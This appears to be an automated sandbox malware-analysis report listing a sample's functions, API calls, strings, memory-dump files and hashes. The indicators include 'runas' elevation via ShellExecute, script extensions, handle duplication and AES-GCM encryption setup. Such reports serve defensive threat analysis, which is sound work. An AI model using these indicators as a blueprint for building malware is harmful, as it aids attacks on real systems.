_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BB92
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BB98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BB9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BBA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BBAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BBB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188BC05

Strings

ios_base::badbit set, xrefs: 00007FF62188BBBA
.exe, xrefs: 00007FF62188B56D
runas, xrefs: 00007FF62188B926
.vbs, xrefs: 00007FF62188B512
ios_base::eofbit set, xrefs: 00007FF62188BBCC
.ps1, xrefs: 00007FF62188B4B4
ios_base::failbit set, xrefs: 00007FF62188BBC5
.cmd, xrefs: 00007FF62188B4E3
open, xrefs: 00007FF62188B91D
.exe, xrefs: 00007FF62188B485
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;', xrefs: 00007FF62188B5B4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExecuteShell
String ID: .cmd$.exe$.exe$.ps1$.vbs$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;'$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open$runas
API String ID: 4120902618-4093014531
Opcode ID: e6c13b4c523eb7e9a4dfbf7fcb0055fee33151f769af47db2456d1a70c515b18
Instruction ID: aa7bc6bb5c43742b05444a37b78f678aad0844876bf9de23795cf8cff47b763b
Opcode Fuzzy Hash: e6c13b4c523eb7e9a4dfbf7fcb0055fee33151f769af47db2456d1a70c515b18
Instruction Fuzzy Hash: 1A22CF72E18B858AEF10DF24D8803ED67A1FB84798F515236EA5D83AA9DF7CD184C341

Function 00007FF621899D30 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 351nativelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF621899D76
GetProcAddress.KERNEL32 ref: 00007FF621899D86
OpenProcess.KERNEL32 ref: 00007FF621899DB8
NtQuerySystemInformation.NTDLL ref: 00007FF621899DE0
NtQuerySystemInformation.NTDLL ref: 00007FF621899E0E
GetCurrentProcess.KERNEL32 ref: 00007FF621899ED3
NtQueryObject.NTDLL ref: 00007FF621899F19
GetFinalPathNameByHandleA.KERNEL32 ref: 00007FF62189A00D
CloseHandle.KERNEL32 ref: 00007FF62189A128
CloseHandle.KERNEL32 ref: 00007FF62189A1B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189A245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189A24B

Strings

ntdll.dll, xrefs: 00007FF621899D6F
File, xrefs: 00007FF621899F4A
NtDuplicateObject, xrefs: 00007FF621899D7F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Handle$Query$CloseInformationProcessSystem_invalid_parameter_noinfo_noreturn$AddressCurrentFinalModuleNameObjectOpenPathProc
String ID: File$NtDuplicateObject$ntdll.dll
API String ID: 1269246921-3955674919
Opcode ID: 40fe1c8b989a36a61033a420a00281763622b81dc4151bdb70d0af1661d8cb31
Instruction ID: 0a1dc1592cd01e240b6b471e41307b0bd00d822bd3839db96042c91872483a77
Opcode Fuzzy Hash: 40fe1c8b989a36a61033a420a00281763622b81dc4151bdb70d0af1661d8cb31
Instruction Fuzzy Hash: 0DE19D62F1CA818AFF108FA5D8A43BD23A1EB45B88F408531DE5ED7B99DE3CD5498341

Function 00007FF621884D40 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 219COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 00007FF621884D9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188513A

Strings

@, xrefs: 00007FF621884F26

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_noreturn
String ID: @
API String ID: 3490963316-2766056989
Opcode ID: c269b81de2aa5c5daf9546ccdf166ffc58e4a4f595ef883c83543340b73b79a7
Instruction ID: 962e3a5bce5f88d79b5fbf6ed7cbd0be951afbe657578537978a5654c8773a71
Opcode Fuzzy Hash: c269b81de2aa5c5daf9546ccdf166ffc58e4a4f595ef883c83543340b73b79a7
Instruction Fuzzy Hash: 93A17C22F0CA858BEB10CF24E8442AD77B2FB48B88F104235EE5AD2A95DF3CD1548341

Function 00007FF6218802C0 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 410COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF621880474
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF621880482
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF621880705
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF621880713
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218808B0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218808B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218808D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218808DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218808E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621880908
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188090E

Strings

value, xrefs: 00007FF62188039A, 00007FF621880633

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
String ID: value
API String ID: 1346393832-494360628
Opcode ID: e8d3f2db0b7352d18d11868a1ec3d435b7428e75cd66e94f9a106f53b33bfa37
Instruction ID: 8f08c166f1b3121c0e55d3273dbb9b480dd7cf8c6bfc3976647c09343af9d710
Opcode Fuzzy Hash: e8d3f2db0b7352d18d11868a1ec3d435b7428e75cd66e94f9a106f53b33bfa37
Instruction Fuzzy Hash: 98028E62A2CBC586EF00CB74D8802AD6761EB857E4F105331FA9ED2ADADF6CD185C741

Function 00007FF621888440 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT ref: 00007FF6218884D8
BCryptSetProperty.BCRYPT ref: 00007FF621888502
BCryptGenerateSymmetricKey.BCRYPT ref: 00007FF62188853B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621888557
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188865B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621888661

Strings

ChainingMode, xrefs: 00007FF6218884F7
AES, xrefs: 00007FF6218884CD
ChainingModeGCM, xrefs: 00007FF6218884F0

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Crypt$_invalid_parameter_noinfo_noreturn$AlgorithmConcurrency::cancel_current_taskGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 2556340343-1213888626
Opcode ID: b7627c36ce67f0fe72bcb585bd48b97c42afc209592653bc37f183dce240245f
Instruction ID: 36cbbd8d832356ad0d4accccb39642ede43c078d79aabf99c672975063e40dbb
Opcode Fuzzy Hash: b7627c36ce67f0fe72bcb585bd48b97c42afc209592653bc37f183dce240245f
Instruction Fuzzy Hash: AC61B362A0C78686FF149B65E8803696360EB85BE8F144631EE5CC7BD6DF3CE5918701

Function 00007FF621861AF0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FF621861D4E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621861DE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621861DE9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621861DEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621861DF5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621861DFB

Strings

parse_error, xrefs: 00007FF621861B7E

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: parse_error
API String ID: 1944019136-3903021949
Opcode ID: 61845abd4b91c286e95b66c37c915ed3fe33cacc2d4b5ff8a6b45fd0a825fb5f
Instruction ID: 6b5a8af692dc46dc09c598334b82031e45274ddf19d3932aabada546f04626b2
Opcode Fuzzy Hash: 61845abd4b91c286e95b66c37c915ed3fe33cacc2d4b5ff8a6b45fd0a825fb5f
Instruction Fuzzy Hash: 99A19263F28B8689FF10CB65D8803BD6361EB99798F105631EA5C96ADADF3CD190C341

Function 00007FF6218B8C04 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

TranslateName.LIBCMT ref: 00007FF6218B8C6E
TranslateName.LIBCMT ref: 00007FF6218B8CA9
GetACP.KERNEL32 ref: 00007FF6218B8CF0
IsValidCodePage.KERNEL32 ref: 00007FF6218B8D28
GetLocaleInfoW.KERNEL32 ref: 00007FF6218B8EE5

Strings

utf8, xrefs: 00007FF6218B8E0C

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
Instruction ID: ccd2cb348d14a35bdc2ff3745f67cc452db2fe2a57968e126b2459406d999c58
Opcode Fuzzy Hash: 41343eb44851c0e8f8055f3926715ba520ae6846787d1c3cb08d70e80e5c003e
Instruction Fuzzy Hash: C7916A32A0D74286EF64AF21D8912B963A5EB46B80F444131DA5DC7796EF3CEA51C702

Function 00007FF6218B964C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6218A9EEC: GetLastError.KERNEL32 ref: 00007FF6218A9EFB
Part of subcall function 00007FF6218A9EEC: FlsGetValue.KERNEL32 ref: 00007FF6218A9F10
Part of subcall function 00007FF6218A9EEC: SetLastError.KERNEL32 ref: 00007FF6218A9F9B

Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F31

GetUserDefaultLCID.KERNEL32 ref: 00007FF6218B97BC

Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F5E
Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F6F
Part of subcall function 00007FF6218A9EEC: FlsSetValue.KERNEL32 ref: 00007FF6218A9F80

EnumSystemLocalesW.KERNEL32 ref: 00007FF6218B97A3
ProcessCodePage.LIBCMT ref: 00007FF6218B97E6
IsValidCodePage.KERNEL32 ref: 00007FF6218B97F8
IsValidLocale.KERNEL32 ref: 00007FF6218B980E
GetLocaleInfoW.KERNEL32 ref: 00007FF6218B986A
GetLocaleInfoW.KERNEL32 ref: 00007FF6218B9886

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 35311c5f5cbb088db9cafc063da405a92d1dac0a49a1e36eea51d3b328654a2c
Instruction ID: ab277b2527ad0fae9d9ee0f11b2a8d1f044077c825da3635504f51b48d4be0e9
Opcode Fuzzy Hash: 35311c5f5cbb088db9cafc063da405a92d1dac0a49a1e36eea51d3b328654a2c
Instruction Fuzzy Hash: F17133A2F1C6028AEF619F60DC906B833A4AF49B48F444435DA1DD3A95EF3CEA45C352

Function 00007FF6218BF2B8 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6218BF2D4
RtlCaptureContext.KERNEL32 ref: 00007FF6218BF301
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6218BF31B
RtlVirtualUnwind.KERNEL32 ref: 00007FF6218BF35C
IsDebuggerPresent.KERNEL32 ref: 00007FF6218BF3B0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6218BF3CD
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6218BF3D8

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 6458172863af31e20951f5f8dc1d486a5fb90de472876968ccfd77d10a4e7fe6
Instruction ID: e42b90838744bad3da5138b6c36546a42c70ffb6e1ef936e87ed44b4d554c01f
Opcode Fuzzy Hash: 6458172863af31e20951f5f8dc1d486a5fb90de472876968ccfd77d10a4e7fe6
Instruction Fuzzy Hash: 90311D76609B8186EB609F60E8903ED73A4FB88744F44403AEA4EC7B99DF7CD648C711

Function 00007FF6218A7F68 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6218A7FE1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6218A7FF9
RtlVirtualUnwind.KERNEL32 ref: 00007FF6218A8034
IsDebuggerPresent.KERNEL32 ref: 00007FF6218A806D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6218A8077
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6218A8082

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 518a55c6435702555d938cb12e0853557d9473da796008457dbc6bc20602c87e
Instruction ID: f2b588d49bbfd824c94a3d6e0fb0de88e53223406f2c2d93cba0831dbf0cab13
Opcode Fuzzy Hash: 518a55c6435702555d938cb12e0853557d9473da796008457dbc6bc20602c87e
Instruction Fuzzy Hash: 0C314136608F8186DB60CF25E8802AE73A4FB89754F540135EA9DC3B99DF3CD6558701

Function 00007FF621870AC0 Relevance: 8.0, APIs: 5, Instructions: 470COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621870B3B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621870B41

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 01221afe69929d199a186f0eb4a6e2f0971999e67bd8fb6b07ee1a9356c54115
Instruction ID: 06795a431fdf925587c753eaedafcaccdd1b1375608675eafe0b388397412c4e
Opcode Fuzzy Hash: 01221afe69929d199a186f0eb4a6e2f0971999e67bd8fb6b07ee1a9356c54115
Instruction Fuzzy Hash: 0C02D062B19B8685EF10CF61D8802BD7361EB49B98F045232DE5C9BB99DF3CE481C341

Function 00007FF62188C8E0 Relevance: 7.9, APIs: 5, Instructions: 391COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF62188C943
ShellExecuteW.SHELL32 ref: 00007FF62188CF8A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188D013
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188D019
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188D01F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ExecuteFileModuleNameShell
String ID:
API String ID: 3435646932-0
Opcode ID: c85d850c89b3edf36938d7acaee476d5537835fda8c3a85c606fb436544720de
Instruction ID: 8287bea134c3bcddeef4fbeddedf5474110c139653f5dac86d55db9fe0550ce2
Opcode Fuzzy Hash: c85d850c89b3edf36938d7acaee476d5537835fda8c3a85c606fb436544720de
Instruction Fuzzy Hash: 8E122B72A29FC48ADB408F29E88069DB3A4F788794F506225FEDD97B59EF38D150C700

Function 00007FF621843A30 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 699COMMON

Download Yara Rule

Strings

ios_base::badbit set, xrefs: 00007FF621844A48, 00007FF621844A8C
filename, xrefs: 00007FF621844624
content, xrefs: 00007FF621844749

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Crypt$AlgorithmProvider$CloseGenerateOpenPropertySymmetric_invalid_parameter_noinfo_noreturn
String ID: content$filename$ios_base::badbit set
API String ID: 3077847781-879919306
Opcode ID: 235afc93dfe63ce797de5ed26d2fabdb4c9c7af3f6f3567fecfb13da9ec8064d
Instruction ID: 0abf79a025053f2df9f24b7e47604d58c4bf0e69a4c7b3074d6b482ecf676967
Opcode Fuzzy Hash: 235afc93dfe63ce797de5ed26d2fabdb4c9c7af3f6f3567fecfb13da9ec8064d
Instruction Fuzzy Hash: F882E13251DBC595EB718B14E8803EAB3A4F7C9780F505226EACD82B69EF7CD594CB40

Function 00007FF6218CD804 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6218CD865
IsDebuggerPresent.KERNEL32 ref: 00007FF6218CD87D
OutputDebugStringW.KERNEL32 ref: 00007FF6218CD88E

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6218CD887

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
